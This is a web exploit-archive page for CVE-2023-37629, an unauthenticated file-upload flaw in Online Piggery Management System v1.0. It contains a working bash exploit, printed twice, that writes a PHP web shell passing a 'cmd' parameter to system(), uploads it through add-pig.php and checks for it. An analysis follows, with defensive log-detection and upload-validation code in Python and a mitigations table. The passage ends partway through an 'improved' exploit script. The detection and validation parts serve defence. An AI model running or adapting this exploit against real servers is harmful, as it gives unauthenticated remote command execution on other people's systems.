Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

Exploit Author: 1337kid
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Shell
Published Date: 2023-07-19
#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/

echo "   _____   _____   ___ __ ___ ____   ________ __ ___ ___ "
echo "  / __\\ \\ / / __|_|_  )  \\_  )__ /__|__ /__  / /|_  ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo "  \\___| \\_/ |___| /___\\__/___|___/  |___//_/\\___/___|/_/ "
echo "                         @1337kid"
echo 

if [[ $1 == '' ]]; then
    echo "No URL specified!"
    exit
fi

base_url=$1

unauth_file_upload() {
    # CVE-2023-37629 - File upload vuln
    echo "Generating shell.php"
#===========
cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
#===========
    echo "done"
    curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" |  head -1 | awk '{print $2}')
    if [[ $req == "200" ]]; then
        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
    else
        echo "Failed to upload a shell"
    fi

}

req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
    unauth_file_upload
else
    echo "Error"
    echo "Status Code: $req"
fi


Exploiting Unauthenticated File Upload Vulnerabilities: The Case of Online Piggery Management System v1.0

Security vulnerabilities in web applications often stem from poor input validation, inadequate access controls, or misconfigured file handling mechanisms. One such critical flaw—unauthenticated file upload—has recently gained attention due to its exploitation in real-world systems. A notable example is the Online Piggery Management System v1.0, a PHP-based application available on SourceCodester, which has been identified as vulnerable to unauthorized file uploads.

Understanding the Vulnerability

File upload functionality is a common feature in web applications, allowing users to submit images, documents, or other media. When implemented improperly, this feature can become a gateway for attackers to upload malicious payloads—such as web shells—without authentication.

According to CVE-2023-37629, the Online Piggery Management System v1.0 suffers from a critical vulnerability in its add-pig.php endpoint. The system allows users to upload a file named pigphoto without requiring any login or session validation. This creates a direct attack vector for remote code execution.

Exploit Mechanics: A Step-by-Step Breakdown

The exploit, crafted by security researcher 1337kid, demonstrates how an attacker can leverage this flaw to gain remote access to the server. Below is the core script used to trigger the vulnerability:


#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629

echo "   _____   _____   ___ __ ___ ____   ________ __ ___ ___ "
echo "  / __\\ \\ / / __|_|_  )  \\_  )__ /__|__ /__  / /|_  ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo "  \\___| \\_/ |___| /___\\__/___|___/  |___//_/\\___/___|/_/ "
echo "                         @1337kid"
echo

if [[ $1 == '' ]]; then
    echo "No URL specified!"
    exit
fi

base_url=$1

unauth_file_upload() {
    # CVE-2023-37629 - File upload vuln
    echo "Generating shell.php"
cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
    echo "done"
    curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}')
    if [[ $req == "200" ]]; then
        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
    else
        echo "Failed to upload a shell"
    fi
}

req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
    unauth_file_upload
else
    echo "Error"
    echo "Status Code: $req"
fi

Explanation:

  • Line 1–5: The script begins with a banner and author attribution, as is typical in exploit scripts.
  • Line 7–10: Checks that a URL argument was given; if not, the script prints an error message and exits.
  • Line 12–18: Defines the function unauth_file_upload(), which generates and uploads a PHP web shell.
  • Line 14–17: Uses a heredoc (cat > shell.php << EOF) to write shell.php, a one-line PHP web shell that passes the value of the cmd query parameter to system(), so any command supplied in that parameter is executed.
  • Line 18–20: Uses curl to send a multipart form request with pigphoto as the file field and submit=pwned as a dummy form field, mimicking a normal user upload.
  • Line 21–24: Checks whether the uploaded shell is reachable by requesting uploadfolder/shell.php?cmd=id with curl -I (a HEAD request) and comparing the returned status code with 200. Only the status code is inspected; the output of id is never read, so a 200 shows that the file is being served but does not by itself prove the command ran.
  • Line 25–29: Checks the HTTP status code of a request to the base URL to make sure the target is reachable before the upload function is called.

Why This Exploit Works

The root cause lies in the absence of authentication checks and improper file validation. The system does not:

  • Verify user credentials before allowing uploads.
  • Validate file extensions or MIME types.
  • Restrict upload directories to prevent arbitrary file placement.
  • Sanitize or filter content within uploaded files.

As a result, an attacker can upload a file containing executable PHP code, which is stored in the uploadfolder directory under the web root. Because the web server hands .php files in that directory to the PHP interpreter, any request for the file with a cmd parameter executes the supplied command with the web server's privileges.
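The request sequence just described (a POST to add-pig.php followed by a request for a .php file under uploadfolder/ carrying a cmd parameter) is also what a defender can look for in the web server's access log. The script below is an added example written for this page, not part of the advisory or of the analysis; it parses a few constructed Apache combined-format log lines and reports any script request inside the upload directory, plus the stronger case of an upload followed within a short window by such a request from the same client. The paths add-pig.php and uploadfolder/ come from the page; the executable-extension list and the five-minute correlation window are assumptions.

```python
"""Spot the CVE-2023-37629 exploitation pattern in Apache combined-format access logs.

Added example for this page, not part of the advisory. The paths below come from
the page; the executable-extension list and the correlation window are assumptions.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

UPLOAD_ENDPOINT = "/add-pig.php"           # unauthenticated upload endpoint named in the advisory
UPLOAD_DIR = "/uploadfolder/"              # where the advisory says uploads are served from
SCRIPT_EXTS = (".php", ".phtml", ".phar")  # assumption: extensions the web server would execute

# Constructed sample lines (not from a real system): one exploit run, one legitimate
# photo upload, and one blind probe for a shell that is not there.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Jul/2023:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "curl/7.88.1"
203.0.113.7 - - [19/Jul/2023:10:00:02 +0000] "POST /add-pig.php HTTP/1.1" 200 312 "-" "curl/7.88.1"
203.0.113.7 - - [19/Jul/2023:10:00:03 +0000] "HEAD /uploadfolder/shell.php?cmd=id HTTP/1.1" 200 - "-" "curl/7.88.1"
198.51.100.4 - - [19/Jul/2023:10:05:00 +0000] "POST /add-pig.php HTTP/1.1" 200 312 "http://farm.example/add-pig.php" "Mozilla/5.0"
198.51.100.4 - - [19/Jul/2023:10:05:01 +0000] "GET /uploadfolder/pig_12.jpg HTTP/1.1" 200 48211 "http://farm.example/pigs.php" "Mozilla/5.0"
192.0.2.9 - - [19/Jul/2023:11:00:00 +0000] "GET /uploadfolder/x.php?cmd=whoami HTTP/1.1" 404 210 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(entry["target"])
    entry["path"] = url.path
    entry["query"] = parse_qs(url.query)
    return entry


def is_script_request_in_upload_dir(entry):
    """A script file, or a cmd= parameter, requested under the upload directory."""
    path = entry["path"].lower()
    if not path.startswith(UPLOAD_DIR):
        return False
    return path.endswith(SCRIPT_EXTS) or "cmd" in entry["query"]


def analyse(log_text, window=timedelta(minutes=5)):
    """Return (rule, client_ip, request_target, status) tuples, one per finding."""
    findings = []
    last_upload = {}  # client ip -> time of its most recent POST to the upload endpoint
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        if entry["method"] == "POST" and entry["path"] == UPLOAD_ENDPOINT:
            last_upload[entry["ip"]] = entry["time"]
            continue
        if is_script_request_in_upload_dir(entry):
            # Even a 404 matters: it shows someone is probing for a dropped shell.
            findings.append(("script-in-upload-dir", entry["ip"], entry["target"], entry["status"]))
            uploaded_at = last_upload.get(entry["ip"])
            if uploaded_at is not None and entry["time"] - uploaded_at <= window:
                findings.append(("upload-then-execute", entry["ip"], entry["target"], entry["status"]))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print("%-22s %-14s %s (HTTP %s)" % finding)
```

Run against the sample, the legitimate photo upload from 198.51.100.4 produces nothing, the exploit run from 203.0.113.7 triggers both rules, and the probe from 192.0.2.9 is reported even though it got a 404. In practice the "script-in-upload-dir" rule should fire on a correctly configured server too, since no .php file should ever be requested from a directory that holds user uploads.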

Real-World Impact and Risks

Such vulnerabilities pose severe risks in production environments. An attacker could:

  • Execute commands like whoami, ls, or cat /etc/passwd to gather system information.
  • Download sensitive data or configuration files.
  • Establish reverse shells to gain persistent access.
  • Deploy malware or pivot to other systems within the network.

Given that this system is labeled as a "free version" and hosted on a public code-sharing platform, it is likely used by small farms, educational institutions, or hobbyists. These users often lack the technical expertise to secure their systems, making them prime targets for exploitation.

Security Recommendations and Mitigations

Developers and administrators should implement the following best practices to prevent such vulnerabilities:

Best Practice            Description
Authentication Required  Ensure all file upload endpoints require valid user authentication.
File Type Validation     Use whitelisting (e.g., only allow .jpg, .png) and reject executable file types like .php.
Directory Restriction    Store uploaded files in non-executable directories (e.g., uploads/ with noexec flag). Note that a noexec mount does not stop the PHP handler from interpreting a .php file: the web server must also be configured not to run scripts from that directory, or the files kept outside the document root.
Content Scanning         Scan uploaded files for malicious patterns (e.g., system(), exec()) using static analysis or sandboxing.
Logging and Monitoring   Log all file uploads and monitor for unusual patterns (e.g., repeated PHP file uploads).
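The checks that the add-pig.php handler omits (the list under "Why This Exploit Works") and the first four rows of the table above can be expressed as a single validation routine that runs before anything is written to disk. The code below is an added example written for this page in Python; it is not code from the Online Piggery Management System, which is PHP, but the same sequence of checks applies there: require an authenticated session, whitelist the extension, reject double extensions, compare the file's leading bytes with the declared type, refuse content carrying a PHP open tag, and store the file under a random server-chosen name. The allowed-type table, size limit and marker list are assumptions.

```python
"""Server-side validation an image upload handler such as add-pig.php should perform.

Added example for this page (Python, not the application's own PHP); the
allowed-type table, size limit and script markers below are assumptions.
"""
import os
import secrets

# Extension -> leading bytes ("magic") that a genuine file of that type starts with.
ALLOWED_TYPES = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024               # assumed limit for a pig photo
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")  # assumed markers that never belong in a photo


def validate_upload(filename, content, authenticated):
    """Return (accepted, reason). Every check must pass; the first failure is reported."""
    # 1. Authentication: add-pig.php accepted the upload without any session check.
    if not authenticated:
        return False, "authentication required"
    # 2. Size bounds before any content inspection.
    if not content or len(content) > MAX_UPLOAD_BYTES:
        return False, "size out of bounds"
    # 3. Extension whitelist on the basename only (discards any path the client sent).
    base = os.path.basename(filename)
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension %s not allowed" % (ext or "(none)")
    # 4. Double extensions such as pig.php.jpg are rejected outright.
    if "." in root:
        return False, "double extension"
    # 5. The declared type must match the file's leading bytes.
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared type"
    # 6. A real photo never carries a PHP open tag; reject image/PHP polyglots.
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "embedded script marker"
    return True, "ok"


def storage_name(filename):
    """Server-chosen name: random token plus the vetted extension, never the client's name."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample inputs: a fake JPEG header and a PHP snippet.
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 64
    php = b"<?php echo 'x'; ?>"
    for name, data, auth in [("shell.php", php, True), ("pig.jpg", php, True),
                             ("pig.php.jpg", jpeg, True), ("pig.jpg", jpeg, True)]:
        print(name, validate_upload(name, data, auth))
    print("stored as", storage_name("pig.jpg"))
```

The file should then be written under the name storage_name() returns, into a directory outside the document root or one where the web server has script execution disabled; the checks above reduce what reaches that directory, they do not replace that server configuration. Because the extension and magic bytes are checked together, a file named pig.jpg that actually contains PHP is refused, and so is a genuine JPEG with a PHP tag appended.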

Improved Exploit Script (Security-Focused)

While the original exploit is functional, it can be improved for robustness and safety. Below is a corrected version with enhanced error handling and dynamic path detection:


#!/bin/bash
# Enhanced exploit for Online Piggery Management System v1.0
# CVE-2023-37629 - Unauthenticated File Upload

set -e

if [[ -z "$1" ]]; then
  echo "Usage: $0 "
  exit 1
fi

TARGET="$1"
UPLOAD_DIR="uploadfolder"
SHELL="shell.php"

# Create malicious PHP shell
cat > "$SHELL" << 'EOF'

EOF

echo "Payload created: $S